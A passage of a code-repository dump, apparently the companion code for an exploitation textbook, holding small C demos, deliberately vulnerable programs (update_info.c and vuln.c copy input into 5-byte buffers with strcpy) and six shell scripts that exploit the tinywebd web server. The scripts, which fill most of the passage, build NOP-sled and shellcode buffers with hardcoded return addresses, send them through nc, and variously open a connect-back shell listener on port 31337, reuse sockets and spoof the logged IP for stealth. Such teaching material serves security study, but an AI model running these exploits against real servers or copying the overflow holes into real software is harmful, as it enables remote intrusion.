c, d; 6 | 7 | a = 13; 8 | b = 5; 9 | 10 | c = a / b; // divide using integers 11 | d = (float) a / (float) b; // divide integers typecast as floats 12 | 13 | printf("[integers]\t a = %d\t b = %d\n", a, b); 14 | printf("[floats]\t c = %f\t d = %f\n", c, d); 15 | } 16 | 17 | 18 | -------------------------------------------------------------------------------- /uid_demo.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() 4 | { 5 | printf("real uid: %d\n", getuid()); 6 | printf("effective uid: %d\n", geteuid()); 7 | } 8 | -------------------------------------------------------------------------------- /update_info.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | 5 | #define MAX_ID_LEN 40 6 | 7 | /* barf a message and exit */ 8 | void barf(char *message, void *extra) { 9 | printf(message, extra); 10 | exit(1); 11 | } 12 | 13 | /* pretend this function updates a product description in a database */ 14 | void update_product_description(char *id, char *desc) 15 | { 16 | char product_code[5]; 17 | strcpy(product_code, id); 18 | 19 | // update database 20 | printf("Updating product #%s with description \'%s\'\n", product_code, desc); 21 | } 22 | 23 | int main(int argc, char *argv[], char *envp[]) 24 | { 25 | int i; 26 | char *id, *desc; 27 | 28 | if(argc < 2) 29 | barf("Usage: %s <id> <description>\n", argv[0]); 30 | id = argv[1]; // id - product code to update in DB 31 | desc = argv[2]; // desc - item description to update 32 | 33 | if(strlen(id) > MAX_ID_LEN) // id must be less than MAX_ID_LEN bytes 34 | barf("Fatal: id argument must be less than %u bytes\n", (void *)MAX_ID_LEN); 35 | 36 | for(i=0; i < strlen(desc)-1; i++) { // only allow printable bytes in desc 37 | if(!(isprint(desc[i]))) 38 | barf("Fatal: description argument can only contain printable bytes\n", NULL); 39 | } 40 | 41 | // clearing out the stack memory (security) 42 | // clearing all arguments except the first and second 43 | memset(argv[0], 0, strlen(argv[0])); 44 | for(i=3; argv[i] != 0; i++) 45 | memset(argv[i], 0, strlen(argv[i])); 46 | // clearing all environment variables 47 | for(i=0; envp[i] != 0; i++) 48 | memset(envp[i], 0, strlen(envp[i])); 49 | 50 | printf("[DEBUG]: desc argument is at %p\n", desc); 51 | update_product_description(id, desc); // update database 52 | } 53 | -------------------------------------------------------------------------------- /vuln.c: -------------------------------------------------------------------------------- 1 | int main(int argc, char *argv[]) { 2 | char buffer[5]; 3 | strcpy(buffer, argv[1]); 4 | return 0; 5 | } 6 | -------------------------------------------------------------------------------- /webroot/image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/webroot/image.jpg -------------------------------------------------------------------------------- /webroot/index.html: -------------------------------------------------------------------------------- 1 | <html> 2 | <head><title>A sample webpage</title></head> 3 | <body bgcolor="#000000" text="#ffffffff"> 4 | <center> 5 | <h1>This is a sample webpage</h1> 6 | ...and here is some sample text<br> 7 | <br> 8 | ..and even a sample image:<br> 9 | <img src="image.jpg"><br> 10 | </center> 11 | </body> 12 | </html> 13 | -------------------------------------------------------------------------------- /webserver_id.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <sys/socket.h> 5 | #include <netinet/in.h> 6 | #include <arpa/inet.h> 7 | #include <netdb.h> 8 | 9 | #include "hacking.h" 10 | #include "hacking-network.h" 11 | 12 | int main(int argc, char *argv[]) { 13 | int sockfd; 14 | struct hostent *host_info; 15 | struct sockaddr_in target_addr; 16 | unsigned char buffer[4096]; 17 | 18 | if(argc < 2) { 19 | printf("Usage: %s <hostname>\n", argv[0]); 20 | exit(1); 21 | } 22 | 23 | if((host_info = gethostbyname(argv[1])) == NULL) 24 | fatal("looking up hostname"); 25 | 26 | if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) 27 | fatal("in socket"); 28 | 29 | target_addr.sin_family = AF_INET; 30 | target_addr.sin_port = htons(80); 31 | target_addr.sin_addr = *((struct in_addr *)host_info->h_addr); 32 | memset(&(target_addr.sin_zero), '\0', 8); // zero the rest of the struct 33 | 34 | if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) 35 | fatal("connecting to target server"); 36 | 37 | send_string(sockfd, "HEAD / HTTP/1.0\r\n\r\n"); 38 | 39 | while(recv_line(sockfd, buffer)) { 40 | if(strncasecmp(buffer, "Server:", 7) == 0) { 41 | printf("The web server for %s is %s\n", argv[1], buffer+8); 42 | exit(0); 43 | } 44 | } 45 | printf("Server line not found\n"); 46 | exit(1); 47 | } 48 | -------------------------------------------------------------------------------- /xtool_tinywebd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # a tool for exploiting tinywebd 3 | 4 | if [ -z "$2" ]; then # if argument 2 is blank 5 | echo "Usage: $0 <shellcode file> <target IP>" 6 | exit 7 | fi 8 | OFFSET=540 9 | RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0 10 | echo "target IP: $2" 11 | SIZE=`wc -c $1 | cut -f1 -d ' '` 12 | echo "shellcode: $1 ($SIZE bytes)" 13 | ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE)) 14 | 15 | echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr ($((4*32)) bytes)]" 16 | ( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; 17 | cat $1; 18 | perl -e "print \"$RETADDR\"x32 . \"\r\n\"";) | nc -w 1 -v $2 80 19 | -------------------------------------------------------------------------------- /xtool_tinywebd_cback.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # a tool for exploiting tinywebd with connectback shellcode 3 | 4 | if [ -z "$2" ]; then # if argument 2 is blank 5 | echo "Usage: $0 <shellcode file> <target IP> [connectback?]" 6 | exit 7 | fi 8 | OFFSET=540 9 | RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff7dc 10 | echo "target IP: $2" 11 | SIZE=`wc -c $1 | cut -f1 -d ' '` 12 | echo "shellcode: $1 ($SIZE bytes)" 13 | ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE)) 14 | echo "aligned sled size: $ALIGNED_SLED_SIZE" 15 | 16 | perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE" > ./.xploit_buffer 17 | cat $1 >> ./.xploit_buffer 18 | perl -e "print \"$RETADDR\"x32 . \"\r\n\"" >> ./.xploit_buffer 19 | 20 | bash -c "sleep 1; cat ./.xploit_buffer | nc -w 1 -v $2 80" & # send the exploit in 1 second 21 | nc -vv -l -p 31337 # listen for connect back 22 | rm ./.xploit_buffer 23 | -------------------------------------------------------------------------------- /xtool_tinywebd_reuse.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # silent stealth exploitation tool for tinywebd 3 | # also spoofs IP address stored in memory 4 | # reuses existing socket -- use socket_reuse shellcode 5 | 6 | SPOOFIP="12.34.56.78" 7 | SPOOFPORT="9090" 8 | 9 | if [ -z "$2" ]; then # if argument 2 is blank 10 | echo "Usage: $0 <shellcode file> <target IP>" 11 | exit 12 | fi 13 | FAKEREQUEST="GET / HTTP/1.1\x00" 14 | FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ') 15 | OFFSET=540 16 | RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0 17 | FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0 18 | echo "target IP: $2" 19 | SIZE=`wc -c $1 | cut -f1 -d ' '` 20 | echo "shellcode: $1 ($SIZE bytes)" 21 | echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)" 22 | ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16)) 23 | 24 | echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]" 25 | (perl -e "print \"$FAKEREQUEST\""; 26 | ./addr_struct "$SPOOFIP" "$SPOOFPORT"; 27 | perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; 28 | cat $1; 29 | perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\""; 30 | cat -;) | nc -v $2 80 31 | 32 | -------------------------------------------------------------------------------- /xtool_tinywebd_silent.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # silent stealth exploitation tool for tinywebd 3 | # also spoofs IP address stored in memory 4 | 5 | SPOOFIP="12.34.56.78" 6 | SPOOFPORT="9090" 7 | 8 | if [ -z "$2" ]; then # if argument 2 is blank 9 | echo "Usage: $0 <shellcode file> <target IP>" 10 | exit 11 | fi 12 | FAKEREQUEST="GET / HTTP/1.1\x00" 13 | FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ') 14 | OFFSET=540 15 | RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0 16 | FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0 17 | echo "target IP: $2" 18 | SIZE=`wc -c $1 | cut -f1 -d ' '` 19 | echo "shellcode: $1 ($SIZE bytes)" 20 | echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)" 21 | ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16)) 22 | 23 | echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]" 24 | (perl -e "print \"$FAKEREQUEST\""; 25 | ./addr_struct "$SPOOFIP" "$SPOOFPORT"; 26 | perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; 27 | cat $1; 28 | perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\"") | nc -w 1 -v $2 80 29 | 30 | -------------------------------------------------------------------------------- /xtool_tinywebd_spoof.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # IP spoofing stealth exploitation tool for tinywebd 3 | 4 | SPOOFIP="12.34.56.78" 5 | SPOOFPORT="9090" 6 | 7 | if [ -z "$2" ]; then # if argument 2 is blank 8 | echo "Usage: $0 <shellcode file> <target IP>" 9 | exit 10 | fi 11 | FAKEREQUEST="GET / HTTP/1.1\x00" 12 | FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ') 13 | OFFSET=540 14 | RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0 15 | FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0 16 | echo "target IP: $2" 17 | SIZE=`wc -c $1 | cut -f1 -d ' '` 18 | echo "shellcode: $1 ($SIZE bytes)" 19 | echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)" 20 | ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16)) 21 | 22 | echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]" 23 | (perl -e "print \"$FAKEREQUEST\""; 24 | ./addr_struct "$SPOOFIP" "$SPOOFPORT"; 25 | perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; 26 | cat $1; 27 | perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\r\n\"") | nc -w 1 -v $2 80 28 | -------------------------------------------------------------------------------- /xtool_tinywebd_steath.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # stealth exploitation tool 3 | if [ -z "$2" ]; then # if argument 2 is blank 4 | echo "Usage: $0 <shellcode file> <target IP>" 5 | exit 6 | fi 7 | FAKEREQUEST="GET / HTTP/1.1\x00" 8 | FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ') 9 | OFFSET=540 10 | RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0 11 | echo "target IP: $2" 12 | SIZE=`wc -c $1 | cut -f1 -d ' '` 13 | echo "shellcode: $1 ($SIZE bytes)" 14 | echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)" 15 | ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE)) 16 | 17 | echo "[Fake Request ($FR_SIZE b)] [NOP ($ALIGNED_SLED_SIZE b)] [shellcode ($SIZE b)] [ret addr ($((4*32)) b)]" 18 | (perl -e "print \"$FAKEREQUEST\" . \"\x90\"x$ALIGNED_SLED_SIZE"; 19 | cat $1; 20 | perl -e "print \"$RETADDR\"x32 . \"\r\n\"") | nc -w 1 -v $2 80 21 | --------------------------------------------------------------------------------